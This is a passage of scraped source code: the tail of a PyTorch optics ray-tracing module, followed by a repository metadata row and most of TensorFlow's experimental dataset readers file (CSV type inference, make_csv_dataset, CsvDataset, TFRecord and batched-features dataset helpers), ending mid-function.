rays_mirror_to_object = mirror.intersect(ray_lens_to_mirror, t2)
color = self.in_dataset[data_id, ind[mask_t1], -3:]
rays_mirror_to_object.origins = torch.matmul(self.full_scale_mat,
torch.cat((rays_mirror_to_object.origins, torch.ones((rays_mirror_to_object.origins.shape[0],1))), dim=1)[:, :, np.newaxis]).squeeze(dim=-1)
rays_mirror_to_object.directions = torch.matmul(self.full_scale_mat,
torch.cat((rays_mirror_to_object.directions, torch.zeros((rays_mirror_to_object.origins.shape[0],1))), dim=1)[:, :, np.newaxis]).squeeze(dim=-1)
rays_mirror_to_object.directions = rays_mirror_to_object.directions/torch.sqrt(torch.sum(rays_mirror_to_object.directions**2, dim=1, keepdim=True))
return rays_mirror_to_object, color.cuda()
def gen_random_rays_at_magis(self, lens, mirror, ind, data_id, mirror_id):
"""
        Generate rays in world space for the given (typically randomly sampled)
        sensor pixel indices of one mirror view, traced through the lens and mirror.
"""
# Sampling rays from the sensor to the lens
origins = torch.zeros(ind.shape[0], 3, device=self.device)
origins[:, 0] = self.continuous_positions[mirror_id][0]
origins[:, 1] = self.in_dataset[data_id, ind, 1]
origins[:, 2] = self.in_dataset[data_id, ind, 2]
points_on_lens = lens.sample_points_on_lens(ind.shape[0], device=self.device)
directions = optics.batch_vector(points_on_lens[:, 0] - origins[:, 0],
points_on_lens[:, 1]*0 - origins[:, 1],
points_on_lens[:, 2]*0 - origins[:, 2])
rays_sensor_to_lens = Rays(origins, directions, device=self.device,
meta = {'target' : self.in_dataset[data_id, ind, -3:].to(self.device),
'ind' : ind})
# Intersection with lens
t1 = lens.get_ray_intersection(rays_sensor_to_lens)
mask_t1 = ~torch.isnan(t1)
ray_lens_to_mirror = lens.intersect(rays_sensor_to_lens.get_at(mask_t1), t1[mask_t1])
# Intersection with mirror
t2 = mirror.get_ray_intersection(ray_lens_to_mirror)
mask = ~torch.isnan(t2)
assert mask.shape[0] == ind[mask_t1].shape[0]
rays_mirror_to_object = mirror.intersect(ray_lens_to_mirror.get_at(mask), t2[mask])
color = self.in_dataset[data_id, ind[mask_t1][mask], -3:]
rays_mirror_to_object.origins = torch.matmul(self.full_scale_mat,
torch.cat((rays_mirror_to_object.origins, torch.ones((rays_mirror_to_object.origins.shape[0],1))), dim=1)[:, :, np.newaxis]).squeeze(dim=-1)
rays_mirror_to_object.directions = torch.matmul(self.full_scale_mat,
torch.cat((rays_mirror_to_object.directions, torch.zeros((rays_mirror_to_object.origins.shape[0],1))), dim=1)[:, :, np.newaxis]).squeeze(dim=-1)
rays_mirror_to_object.directions = rays_mirror_to_object.directions/torch.sqrt(torch.sum(rays_mirror_to_object.directions**2, dim=1, keepdim=True))
return rays_mirror_to_object, color.cuda()
| 48.370229 | 217 | 0.609011 |
79465a0fd532b07e96285d1cf5897e63c44cfc9a | 41,198 | py | Python | tensorflow/python/data/experimental/ops/readers.py | nathanielchu/tensorflow | 92d160f610a6af39f644a265693cf16804ef78a9 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/data/experimental/ops/readers.py | nathanielchu/tensorflow | 92d160f610a6af39f644a265693cf16804ef78a9 | [
"Apache-2.0"
] | null | null | null | tensorflow/python/data/experimental/ops/readers.py | nathanielchu/tensorflow | 92d160f610a6af39f644a265693cf16804ef78a9 | [
"Apache-2.0"
] | null | null | null | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Python wrappers for reader Datasets."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import csv
import functools
import numpy as np
from tensorflow.python.data.experimental.ops import batching
from tensorflow.python.data.experimental.ops import error_ops
from tensorflow.python.data.experimental.ops import interleave_ops
from tensorflow.python.data.experimental.ops import parsing_ops
from tensorflow.python.data.experimental.ops import shuffle_ops
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import readers as core_readers
from tensorflow.python.data.util import convert
from tensorflow.python.data.util import nest
from tensorflow.python.data.util import structure
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.lib.io import file_io
from tensorflow.python.ops import gen_experimental_dataset_ops
from tensorflow.python.ops import io_ops
from tensorflow.python.platform import gfile
from tensorflow.python.util.tf_export import tf_export
_ACCEPTABLE_CSV_TYPES = (dtypes.float32, dtypes.float64, dtypes.int32,
dtypes.int64, dtypes.string)
def _is_valid_int32(str_val):
try:
# Checks equality to prevent int32 overflow
return dtypes.int32.as_numpy_dtype(str_val) == dtypes.int64.as_numpy_dtype(
str_val)
except (ValueError, OverflowError):
return False
def _is_valid_int64(str_val):
try:
dtypes.int64.as_numpy_dtype(str_val)
return True
except (ValueError, OverflowError):
return False
def _is_valid_float(str_val, float_dtype):
try:
return float_dtype.as_numpy_dtype(str_val) < np.inf
except ValueError:
return False
def _infer_type(str_val, na_value, prev_type):
"""Given a string, infers its tensor type.
Infers the type of a value by picking the least 'permissive' type possible,
while still allowing the previous type inference for this column to be valid.
Args:
str_val: String value to infer the type of.
na_value: Additional string to recognize as a NA/NaN CSV value.
prev_type: Type previously inferred based on values of this column that
we've seen up till now.
Returns:
Inferred dtype.
"""
if str_val in ("", na_value):
# If the field is null, it gives no extra information about its type
return prev_type
type_list = [
dtypes.int32, dtypes.int64, dtypes.float32, dtypes.float64, dtypes.string
] # list of types to try, ordered from least permissive to most
type_functions = [
_is_valid_int32,
_is_valid_int64,
lambda str_val: _is_valid_float(str_val, dtypes.float32),
lambda str_val: _is_valid_float(str_val, dtypes.float64),
lambda str_val: True,
] # Corresponding list of validation functions
for i in range(len(type_list)):
validation_fn = type_functions[i]
if validation_fn(str_val) and (prev_type is None or
prev_type in type_list[:i + 1]):
return type_list[i]
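
# --- Editorial example (not part of the original TensorFlow source): the inference
# only ever widens a column's type across rows. For instance, with na_value="":
#
#   _infer_type("12", "", None)            -> dtypes.int32
#   _infer_type("4.5", "", dtypes.int32)   -> dtypes.float32   (widened)
#   _infer_type("", "", dtypes.float32)    -> dtypes.float32   (nulls keep prev type)
#   _infer_type("abc", "", dtypes.float32) -> dtypes.string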
def _next_csv_row(filenames, num_cols, field_delim, use_quote_delim, header):
"""Generator that yields rows of CSV file(s) in order."""
for fn in filenames:
with file_io.FileIO(fn, "r") as f:
rdr = csv.reader(
f,
delimiter=field_delim,
quoting=csv.QUOTE_MINIMAL if use_quote_delim else csv.QUOTE_NONE)
if header:
next(rdr) # Skip header lines
for csv_row in rdr:
if len(csv_row) != num_cols:
raise ValueError(
"Problem inferring types: CSV row has different number of fields "
"than expected.")
yield csv_row
def _infer_column_defaults(filenames, num_cols, field_delim, use_quote_delim,
na_value, header, num_rows_for_inference,
select_columns):
"""Infers column types from the first N valid CSV records of files."""
if select_columns is None:
select_columns = range(num_cols)
inferred_types = [None] * len(select_columns)
for i, csv_row in enumerate(
_next_csv_row(filenames, num_cols, field_delim, use_quote_delim, header)):
if num_rows_for_inference is not None and i >= num_rows_for_inference:
break
for j, col_index in enumerate(select_columns):
inferred_types[j] = _infer_type(csv_row[col_index], na_value,
inferred_types[j])
# Replace None's with a default type
inferred_types = [t or dtypes.string for t in inferred_types]
# Default to 0 or '' for null values
return [
constant_op.constant([0 if t is not dtypes.string else ""], dtype=t)
for t in inferred_types
]
def _infer_column_names(filenames, field_delim, use_quote_delim):
"""Infers column names from first rows of files."""
csv_kwargs = {
"delimiter": field_delim,
"quoting": csv.QUOTE_MINIMAL if use_quote_delim else csv.QUOTE_NONE
}
with file_io.FileIO(filenames[0], "r") as f:
try:
column_names = next(csv.reader(f, **csv_kwargs))
except StopIteration:
raise ValueError(("Received StopIteration when reading the header line "
"of %s. Empty file?") % filenames[0])
for name in filenames[1:]:
with file_io.FileIO(name, "r") as f:
try:
if next(csv.reader(f, **csv_kwargs)) != column_names:
raise ValueError(
"Files have different column names in the header row.")
except StopIteration:
raise ValueError(("Received StopIteration when reading the header line "
"of %s. Empty file?") % filenames[0])
return column_names
def _get_sorted_col_indices(select_columns, column_names):
"""Transforms select_columns argument into sorted column indices."""
names_to_indices = {n: i for i, n in enumerate(column_names)}
num_cols = len(column_names)
for i, v in enumerate(select_columns):
if isinstance(v, int):
if v < 0 or v >= num_cols:
raise ValueError(
"Column index %d specified in select_columns out of valid range." %
v)
continue
if v not in names_to_indices:
raise ValueError(
"Value '%s' specified in select_columns not a valid column index or "
"name." % v)
select_columns[i] = names_to_indices[v]
# Sort and ensure there are no duplicates
result = sorted(set(select_columns))
if len(result) != len(select_columns):
raise ValueError("select_columns contains duplicate columns")
return result
def _maybe_shuffle_and_repeat(
dataset, num_epochs, shuffle, shuffle_buffer_size, shuffle_seed):
"""Optionally shuffle and repeat dataset, as requested."""
if num_epochs != 1 and shuffle:
# Use shuffle_and_repeat for perf
return dataset.apply(
shuffle_ops.shuffle_and_repeat(shuffle_buffer_size, num_epochs,
shuffle_seed))
elif shuffle:
return dataset.shuffle(shuffle_buffer_size, shuffle_seed)
elif num_epochs != 1:
return dataset.repeat(num_epochs)
return dataset
def make_tf_record_dataset(file_pattern,
batch_size,
parser_fn=None,
num_epochs=None,
shuffle=True,
shuffle_buffer_size=None,
shuffle_seed=None,
prefetch_buffer_size=dataset_ops.AUTOTUNE,
num_parallel_reads=None,
num_parallel_parser_calls=None,
drop_final_batch=False):
"""Reads and optionally parses TFRecord files into a dataset.
Provides common functionality such as batching, optional parsing, shuffling,
and performant defaults.
Args:
file_pattern: List of files or patterns of TFRecord file paths.
See `tf.io.gfile.glob` for pattern rules.
batch_size: An int representing the number of records to combine
in a single batch.
parser_fn: (Optional.) A function accepting string input to parse
and process the record contents. This function must map records
to components of a fixed shape, so they may be batched. By
default, uses the record contents unmodified.
num_epochs: (Optional.) An int specifying the number of times this
dataset is repeated. If None (the default), cycles through the
dataset forever.
shuffle: (Optional.) A bool that indicates whether the input
should be shuffled. Defaults to `True`.
shuffle_buffer_size: (Optional.) Buffer size to use for
shuffling. A large buffer size ensures better shuffling, but
increases memory usage and startup time.
shuffle_seed: (Optional.) Randomization seed to use for shuffling.
prefetch_buffer_size: (Optional.) An int specifying the number of
feature batches to prefetch for performance improvement.
Defaults to auto-tune. Set to 0 to disable prefetching.
num_parallel_reads: (Optional.) Number of threads used to read
records from files. By default or if set to a value >1, the
results will be interleaved.
    num_parallel_parser_calls: (Optional.) Number of records to parse in
      parallel. Defaults to an automatic selection.
drop_final_batch: (Optional.) Whether the last batch should be
dropped in case its size is smaller than `batch_size`; the
default behavior is not to drop the smaller batch.
Returns:
A dataset, where each element matches the output of `parser_fn`
except it will have an additional leading `batch-size` dimension,
or a `batch_size`-length 1-D tensor of strings if `parser_fn` is
unspecified.
"""
files = dataset_ops.Dataset.list_files(
file_pattern, shuffle=shuffle, seed=shuffle_seed)
if num_parallel_reads is None:
# Note: We considered auto-tuning this value, but there is a concern
# that this affects the mixing of records from different files, which
# could affect training convergence/accuracy, so we are defaulting to
# a constant for now.
num_parallel_reads = 24
dataset = core_readers.TFRecordDataset(
files, num_parallel_reads=num_parallel_reads)
if shuffle_buffer_size is None:
# TODO(josh11b): Auto-tune this value when not specified
shuffle_buffer_size = 10000
dataset = _maybe_shuffle_and_repeat(
dataset, num_epochs, shuffle, shuffle_buffer_size, shuffle_seed)
# NOTE(mrry): We set `drop_final_batch=True` when `num_epochs is None` to
# improve the shape inference, because it makes the batch dimension static.
# It is safe to do this because in that case we are repeating the input
# indefinitely, and all batches will be full-sized.
drop_final_batch = drop_final_batch or num_epochs is None
if parser_fn is None:
dataset = dataset.batch(batch_size, drop_remainder=drop_final_batch)
else:
# TODO(josh11b): if num_parallel_parser_calls is None, use some function
# of num cores instead of map_and_batch's default behavior of one batch.
dataset = dataset.apply(batching.map_and_batch(
parser_fn, batch_size, num_parallel_calls=num_parallel_parser_calls,
drop_remainder=drop_final_batch))
if prefetch_buffer_size == 0:
return dataset
else:
return dataset.prefetch(buffer_size=prefetch_buffer_size)
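
# --- Editorial example (not part of the original TensorFlow source; this helper does
# not carry a `tf_export` decorator here, so the sketch calls it from within this
# module). A hedged sketch of typical usage, assuming eager execution,
# `import tensorflow as tf`, and existing TFRecord files of serialized
# `tf.train.Example` protos; the path and feature spec are made up for illustration:
#
#   feature_spec = {"x": tf.io.FixedLenFeature([], tf.float32)}
#
#   dataset = make_tf_record_dataset(
#       "/data/train-*.tfrecord",
#       batch_size=32,
#       parser_fn=lambda record: tf.io.parse_single_example(record, feature_spec),
#       num_epochs=1,
#       shuffle=True)
#
#   for batch in dataset.take(1):
#     print(batch["x"].shape)   # (32,) for a full batch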
@tf_export("data.experimental.make_csv_dataset", v1=[])
def make_csv_dataset_v2(
file_pattern,
batch_size,
column_names=None,
column_defaults=None,
label_name=None,
select_columns=None,
field_delim=",",
use_quote_delim=True,
na_value="",
header=True,
num_epochs=None,
shuffle=True,
shuffle_buffer_size=10000,
shuffle_seed=None,
prefetch_buffer_size=dataset_ops.AUTOTUNE,
num_parallel_reads=1,
sloppy=False,
num_rows_for_inference=100,
compression_type=None,
ignore_errors=False,
):
"""Reads CSV files into a dataset.
Reads CSV files into a dataset, where each element is a (features, labels)
tuple that corresponds to a batch of CSV rows. The features dictionary
maps feature column names to `Tensor`s containing the corresponding
feature data, and labels is a `Tensor` containing the batch's label data.
Args:
file_pattern: List of files or patterns of file paths containing CSV
records. See `tf.io.gfile.glob` for pattern rules.
batch_size: An int representing the number of records to combine
in a single batch.
column_names: An optional list of strings that corresponds to the CSV
columns, in order. One per column of the input record. If this is not
provided, infers the column names from the first row of the records.
These names will be the keys of the features dict of each dataset element.
    column_defaults: An optional list of default values for the CSV fields. One
item per selected column of the input record. Each item in the list is
either a valid CSV dtype (float32, float64, int32, int64, or string), or a
`Tensor` with one of the aforementioned types. The tensor can either be
a scalar default value (if the column is optional), or an empty tensor (if
the column is required). If a dtype is provided instead of a tensor, the
column is also treated as required. If this list is not provided, tries
to infer types based on reading the first num_rows_for_inference rows of
files specified, and assumes all columns are optional, defaulting to `0`
for numeric values and `""` for string values. If both this and
`select_columns` are specified, these must have the same lengths, and
`column_defaults` is assumed to be sorted in order of increasing column
index.
    label_name: An optional string corresponding to the label column. If
provided, the data for this column is returned as a separate `Tensor` from
the features dictionary, so that the dataset complies with the format
expected by a `tf.Estimator.train` or `tf.Estimator.evaluate` input
function.
select_columns: An optional list of integer indices or string column
names, that specifies a subset of columns of CSV data to select. If
column names are provided, these must correspond to names provided in
`column_names` or inferred from the file header lines. When this argument
is specified, only a subset of CSV columns will be parsed and returned,
corresponding to the columns specified. Using this results in faster
parsing and lower memory usage. If both this and `column_defaults` are
specified, these must have the same lengths, and `column_defaults` is
assumed to be sorted in order of increasing column index.
field_delim: An optional `string`. Defaults to `","`. Char delimiter to
separate fields in a record.
use_quote_delim: An optional bool. Defaults to `True`. If false, treats
double quotation marks as regular characters inside of the string fields.
na_value: Additional string to recognize as NA/NaN.
header: A bool that indicates whether the first rows of provided CSV files
correspond to header lines with column names, and should not be included
in the data.
num_epochs: An int specifying the number of times this dataset is repeated.
If None, cycles through the dataset forever.
shuffle: A bool that indicates whether the input should be shuffled.
shuffle_buffer_size: Buffer size to use for shuffling. A large buffer size
ensures better shuffling, but increases memory usage and startup time.
shuffle_seed: Randomization seed to use for shuffling.
prefetch_buffer_size: An int specifying the number of feature
batches to prefetch for performance improvement. Recommended value is the
number of batches consumed per training step. Defaults to auto-tune.
num_parallel_reads: Number of threads used to read CSV records from files.
If >1, the results will be interleaved.
sloppy: If `True`, reading performance will be improved at
the cost of non-deterministic ordering. If `False`, the order of elements
produced is deterministic prior to shuffling (elements are still
randomized if `shuffle=True`. Note that if the seed is set, then order
of elements after shuffling is deterministic). Defaults to `False`.
num_rows_for_inference: Number of rows of a file to use for type inference
if record_defaults is not provided. If None, reads all the rows of all
the files. Defaults to 100.
compression_type: (Optional.) A `tf.string` scalar evaluating to one of
`""` (no compression), `"ZLIB"`, or `"GZIP"`. Defaults to no compression.
ignore_errors: (Optional.) If `True`, ignores errors with CSV file parsing,
such as malformed data or empty lines, and moves on to the next valid
CSV record. Otherwise, the dataset raises an error and stops processing
when encountering any invalid records. Defaults to `False`.
Returns:
A dataset, where each element is a (features, labels) tuple that corresponds
to a batch of `batch_size` CSV rows. The features dictionary maps feature
column names to `Tensor`s containing the corresponding column data, and
labels is a `Tensor` containing the column data for the label column
specified by `label_name`.
Raises:
ValueError: If any of the arguments is malformed.
"""
# Create dataset of all matching filenames
filenames = _get_file_names(file_pattern, False)
dataset = dataset_ops.Dataset.from_tensor_slices(filenames)
if shuffle:
dataset = dataset.shuffle(len(filenames), shuffle_seed)
# Clean arguments; figure out column names and defaults
if column_names is None:
if not header:
raise ValueError("Cannot infer column names without a header line.")
# If column names are not provided, infer from the header lines
column_names = _infer_column_names(filenames, field_delim, use_quote_delim)
if len(column_names) != len(set(column_names)):
raise ValueError("Cannot have duplicate column names.")
if select_columns is not None:
select_columns = _get_sorted_col_indices(select_columns, column_names)
if column_defaults is not None:
column_defaults = [
constant_op.constant([], dtype=x) if x in _ACCEPTABLE_CSV_TYPES else x
for x in column_defaults
]
else:
# If column defaults are not provided, infer from records at graph
# construction time
column_defaults = _infer_column_defaults(
filenames, len(column_names), field_delim, use_quote_delim, na_value,
header, num_rows_for_inference, select_columns)
if select_columns is not None and len(column_defaults) != len(select_columns):
raise ValueError(
"If specified, column_defaults and select_columns must have same "
"length."
)
if select_columns is not None and len(column_names) > len(select_columns):
# Pick the relevant subset of column names
column_names = [column_names[i] for i in select_columns]
if label_name is not None and label_name not in column_names:
raise ValueError("`label_name` provided must be one of the columns.")
def filename_to_dataset(filename):
dataset = CsvDataset(
filename,
record_defaults=column_defaults,
field_delim=field_delim,
use_quote_delim=use_quote_delim,
na_value=na_value,
select_cols=select_columns,
header=header,
compression_type=compression_type
)
if ignore_errors:
dataset = dataset.apply(error_ops.ignore_errors())
return dataset
def map_fn(*columns):
"""Organizes columns into a features dictionary.
Args:
*columns: list of `Tensor`s corresponding to one csv record.
Returns:
An OrderedDict of feature names to values for that particular record. If
label_name is provided, extracts the label feature to be returned as the
second element of the tuple.
"""
features = collections.OrderedDict(zip(column_names, columns))
if label_name is not None:
label = features.pop(label_name)
return features, label
return features
# Read files sequentially (if num_parallel_reads=1) or in parallel
dataset = dataset.apply(
interleave_ops.parallel_interleave(
filename_to_dataset, cycle_length=num_parallel_reads, sloppy=sloppy))
dataset = _maybe_shuffle_and_repeat(
dataset, num_epochs, shuffle, shuffle_buffer_size, shuffle_seed)
# Apply batch before map for perf, because map has high overhead relative
# to the size of the computation in each map.
# NOTE(mrry): We set `drop_remainder=True` when `num_epochs is None` to
# improve the shape inference, because it makes the batch dimension static.
# It is safe to do this because in that case we are repeating the input
# indefinitely, and all batches will be full-sized.
dataset = dataset.batch(batch_size=batch_size,
drop_remainder=num_epochs is None)
dataset = dataset_ops.MapDataset(
dataset, map_fn, use_inter_op_parallelism=False)
dataset = dataset.prefetch(prefetch_buffer_size)
return dataset
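
# --- Editorial example (not part of the original TensorFlow source). A hedged sketch
# of typical usage via the exported symbol, assuming eager execution,
# `import tensorflow as tf`, and a small CSV written purely for illustration:
#
#   with open("/tmp/example.csv", "w") as f:
#     f.write("age,gender,label\n0,f,1\n3,m,0\n")
#
#   dataset = tf.data.experimental.make_csv_dataset(
#       "/tmp/example.csv", batch_size=2, label_name="label",
#       num_epochs=1, shuffle=False)
#
#   features, labels = next(iter(dataset))
#   # features is an OrderedDict, e.g. features["age"] == [0, 3] and labels == [1, 0]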
@tf_export(v1=["data.experimental.make_csv_dataset"])
def make_csv_dataset_v1(
file_pattern,
batch_size,
column_names=None,
column_defaults=None,
label_name=None,
select_columns=None,
field_delim=",",
use_quote_delim=True,
na_value="",
header=True,
num_epochs=None,
shuffle=True,
shuffle_buffer_size=10000,
shuffle_seed=None,
prefetch_buffer_size=dataset_ops.AUTOTUNE,
num_parallel_reads=1,
sloppy=False,
num_rows_for_inference=100,
compression_type=None,
ignore_errors=False,
): # pylint: disable=missing-docstring
return dataset_ops.DatasetV1Adapter(make_csv_dataset_v2(
file_pattern, batch_size, column_names, column_defaults, label_name,
select_columns, field_delim, use_quote_delim, na_value, header,
num_epochs, shuffle, shuffle_buffer_size, shuffle_seed,
prefetch_buffer_size, num_parallel_reads, sloppy, num_rows_for_inference,
compression_type, ignore_errors))
make_csv_dataset_v1.__doc__ = make_csv_dataset_v2.__doc__
_DEFAULT_READER_BUFFER_SIZE_BYTES = 4 * 1024 * 1024 # 4 MB
@tf_export("data.experimental.CsvDataset", v1=[])
class CsvDatasetV2(dataset_ops.DatasetSource):
"""A Dataset comprising lines from one or more CSV files."""
def __init__(self,
filenames,
record_defaults,
compression_type=None,
buffer_size=None,
header=False,
field_delim=",",
use_quote_delim=True,
na_value="",
select_cols=None):
"""Creates a `CsvDataset` by reading and decoding CSV files.
The elements of this dataset correspond to records from the file(s).
RFC 4180 format is expected for CSV files
(https://tools.ietf.org/html/rfc4180)
    Note that we allow leading and trailing spaces with int or float fields.
For example, suppose we have a file 'my_file0.csv' with four CSV columns of
different data types:
```
abcdefg,4.28E10,5.55E6,12
hijklmn,-5.3E14,,2
```
We can construct a CsvDataset from it as follows:
```python
tf.compat.v1.enable_eager_execution()
dataset = tf.data.experimental.CsvDataset(
"my_file*.csv",
[tf.float32, # Required field, use dtype or empty tensor
tf.constant([0.0], dtype=tf.float32), # Optional field, default to 0.0
tf.int32, # Required field, use dtype or empty tensor
],
select_cols=[1,2,3] # Only parse last three columns
)
```
The expected output of its iterations is:
```python
for element in dataset:
print(element)
>> (4.28e10, 5.55e6, 12)
>> (-5.3e14, 0.0, 2)
```
Args:
filenames: A `tf.string` tensor containing one or more filenames.
record_defaults: A list of default values for the CSV fields. Each item in
the list is either a valid CSV `DType` (float32, float64, int32, int64,
string), or a `Tensor` object with one of the above types. One per
column of CSV data, with either a scalar `Tensor` default value for the
column if it is optional, or `DType` or empty `Tensor` if required. If
both this and `select_columns` are specified, these must have the same
lengths, and `column_defaults` is assumed to be sorted in order of
increasing column index.
compression_type: (Optional.) A `tf.string` scalar evaluating to one of
`""` (no compression), `"ZLIB"`, or `"GZIP"`. Defaults to no
compression.
buffer_size: (Optional.) A `tf.int64` scalar denoting the number of bytes
to buffer while reading files. Defaults to 4MB.
header: (Optional.) A `tf.bool` scalar indicating whether the CSV file(s)
have header line(s) that should be skipped when parsing. Defaults to
`False`.
field_delim: (Optional.) A `tf.string` scalar containing the delimiter
character that separates fields in a record. Defaults to `","`.
use_quote_delim: (Optional.) A `tf.bool` scalar. If `False`, treats
double quotation marks as regular characters inside of string fields
(ignoring RFC 4180, Section 2, Bullet 5). Defaults to `True`.
na_value: (Optional.) A `tf.string` scalar indicating a value that will
be treated as NA/NaN.
select_cols: (Optional.) A sorted list of column indices to select from
the input data. If specified, only this subset of columns will be
parsed. Defaults to parsing all columns.
"""
self._filenames = ops.convert_to_tensor(
filenames, dtype=dtypes.string, name="filenames")
self._compression_type = convert.optional_param_to_tensor(
"compression_type",
compression_type,
argument_default="",
argument_dtype=dtypes.string)
record_defaults = [
constant_op.constant([], dtype=x) if x in _ACCEPTABLE_CSV_TYPES else x
for x in record_defaults
]
self._record_defaults = ops.convert_n_to_tensor(
record_defaults, name="record_defaults")
self._buffer_size = convert.optional_param_to_tensor(
"buffer_size", buffer_size, _DEFAULT_READER_BUFFER_SIZE_BYTES)
self._header = ops.convert_to_tensor(
header, dtype=dtypes.bool, name="header")
self._field_delim = ops.convert_to_tensor(
field_delim, dtype=dtypes.string, name="field_delim")
self._use_quote_delim = ops.convert_to_tensor(
use_quote_delim, dtype=dtypes.bool, name="use_quote_delim")
self._na_value = ops.convert_to_tensor(
na_value, dtype=dtypes.string, name="na_value")
self._select_cols = convert.optional_param_to_tensor(
"select_cols",
select_cols,
argument_default=[],
argument_dtype=dtypes.int64,
)
self._structure = structure.NestedStructure(
tuple(structure.TensorStructure(d.dtype, [])
for d in self._record_defaults))
variant_tensor = gen_experimental_dataset_ops.experimental_csv_dataset(
filenames=self._filenames,
record_defaults=self._record_defaults,
buffer_size=self._buffer_size,
header=self._header,
output_shapes=self._structure._flat_shapes, # pylint: disable=protected-access
field_delim=self._field_delim,
use_quote_delim=self._use_quote_delim,
na_value=self._na_value,
select_cols=self._select_cols,
compression_type=self._compression_type)
super(CsvDatasetV2, self).__init__(variant_tensor)
@property
def _element_structure(self):
return self._structure
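# A minimal, hypothetical usage sketch of the constructor documented above. The
# file pattern and column layout (an int64 id in column 0, an optional float
# score in column 2, and a string label in column 3) are assumptions made for
# illustration only; note how `record_defaults` and `select_cols` have the same
# length and `select_cols` is sorted.
def _csv_dataset_usage_sketch():  # pragma: no cover - documentation sketch only
  return CsvDatasetV2(
      "ratings-*.csv",
      record_defaults=[
          dtypes.int64,                                 # column 0: required
          constant_op.constant([0.0], dtypes.float32),  # column 2: optional
          dtypes.string,                                # column 3: required
      ],
      header=True,
      select_cols=[0, 2, 3])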
@tf_export(v1=["data.experimental.CsvDataset"])
class CsvDatasetV1(dataset_ops.DatasetV1Adapter):
"""A Dataset comprising lines from one or more CSV files."""
@functools.wraps(CsvDatasetV2.__init__)
def __init__(self,
filenames,
record_defaults,
compression_type=None,
buffer_size=None,
header=False,
field_delim=",",
use_quote_delim=True,
na_value="",
select_cols=None):
wrapped = CsvDatasetV2(filenames, record_defaults, compression_type,
buffer_size, header, field_delim, use_quote_delim,
na_value, select_cols)
super(CsvDatasetV1, self).__init__(wrapped)
@tf_export("data.experimental.make_batched_features_dataset", v1=[])
def make_batched_features_dataset_v2(file_pattern,
batch_size,
features,
reader=core_readers.TFRecordDataset,
label_key=None,
reader_args=None,
num_epochs=None,
shuffle=True,
shuffle_buffer_size=10000,
shuffle_seed=None,
prefetch_buffer_size=dataset_ops.AUTOTUNE,
reader_num_threads=1,
parser_num_threads=2,
sloppy_ordering=False,
drop_final_batch=False):
"""Returns a `Dataset` of feature dictionaries from `Example` protos.
  If the `label_key` argument is provided, the returned `Dataset` yields tuples
  of (feature dictionary, label); see the usage sketch after this function for
  an example.
Example:
```
serialized_examples = [
features {
feature { key: "age" value { int64_list { value: [ 0 ] } } }
feature { key: "gender" value { bytes_list { value: [ "f" ] } } }
feature { key: "kws" value { bytes_list { value: [ "code", "art" ] } } }
},
features {
feature { key: "age" value { int64_list { value: [] } } }
feature { key: "gender" value { bytes_list { value: [ "f" ] } } }
feature { key: "kws" value { bytes_list { value: [ "sports" ] } } }
}
]
```
We can use arguments:
```
features: {
"age": FixedLenFeature([], dtype=tf.int64, default_value=-1),
"gender": FixedLenFeature([], dtype=tf.string),
"kws": VarLenFeature(dtype=tf.string),
}
```
And the expected output is:
```python
{
"age": [[0], [-1]],
"gender": [["f"], ["f"]],
"kws": SparseTensor(
indices=[[0, 0], [0, 1], [1, 0]],
      values=["code", "art", "sports"],
dense_shape=[2, 2]),
}
```
Args:
file_pattern: List of files or patterns of file paths containing
`Example` records. See `tf.io.gfile.glob` for pattern rules.
batch_size: An int representing the number of records to combine
in a single batch.
features: A `dict` mapping feature keys to `FixedLenFeature` or
`VarLenFeature` values. See `tf.io.parse_example`.
reader: A function or class that can be
called with a `filenames` tensor and (optional) `reader_args` and returns
a `Dataset` of `Example` tensors. Defaults to `tf.data.TFRecordDataset`.
    label_key: (Optional) A string corresponding to the key under which labels
      are stored in the `tf.Example` protos. If provided, it must be one of the
      `features` keys, otherwise a `ValueError` is raised.
reader_args: Additional arguments to pass to the reader class.
num_epochs: Integer specifying the number of times to read through the
dataset. If None, cycles through the dataset forever. Defaults to `None`.
shuffle: A boolean, indicates whether the input should be shuffled. Defaults
to `True`.
    shuffle_buffer_size: Buffer size of the ShuffleDataset. A larger capacity
      ensures better shuffling but increases memory usage and startup time.
shuffle_seed: Randomization seed to use for shuffling.
prefetch_buffer_size: Number of feature batches to prefetch in order to
improve performance. Recommended value is the number of batches consumed
per training step. Defaults to auto-tune.
reader_num_threads: Number of threads used to read `Example` records. If >1,
the results will be interleaved.
parser_num_threads: Number of threads to use for parsing `Example` tensors
into a dictionary of `Feature` tensors.
sloppy_ordering: If `True`, reading performance will be improved at
the cost of non-deterministic ordering. If `False`, the order of elements
produced is deterministic prior to shuffling (elements are still
randomized if `shuffle=True`. Note that if the seed is set, then order
of elements after shuffling is deterministic). Defaults to `False`.
drop_final_batch: If `True`, and the batch size does not evenly divide the
input dataset size, the final smaller batch will be dropped. Defaults to
`False`.
Returns:
A dataset of `dict` elements, (or a tuple of `dict` elements and label).
Each `dict` maps feature keys to `Tensor` or `SparseTensor` objects.
Raises:
TypeError: If `reader` is a `tf.compat.v1.ReaderBase` subclass.
ValueError: If `label_key` is not one of the `features` keys.
"""
# Create dataset of all matching filenames
dataset = dataset_ops.Dataset.list_files(
file_pattern, shuffle=shuffle, seed=shuffle_seed)
if isinstance(reader, type) and issubclass(reader, io_ops.ReaderBase):
raise TypeError("The `reader` argument must return a `Dataset` object. "
"`tf.ReaderBase` subclasses are not supported. For "
"example, pass `tf.data.TFRecordDataset` instead of "
"`tf.TFRecordReader`.")
# Read `Example` records from files as tensor objects.
if reader_args is None:
reader_args = []
# Read files sequentially (if reader_num_threads=1) or in parallel
dataset = dataset.apply(
interleave_ops.parallel_interleave(
lambda filename: reader(filename, *reader_args),
cycle_length=reader_num_threads,
sloppy=sloppy_ordering))
# Extract values if the `Example` tensors are stored as key-value tuples.
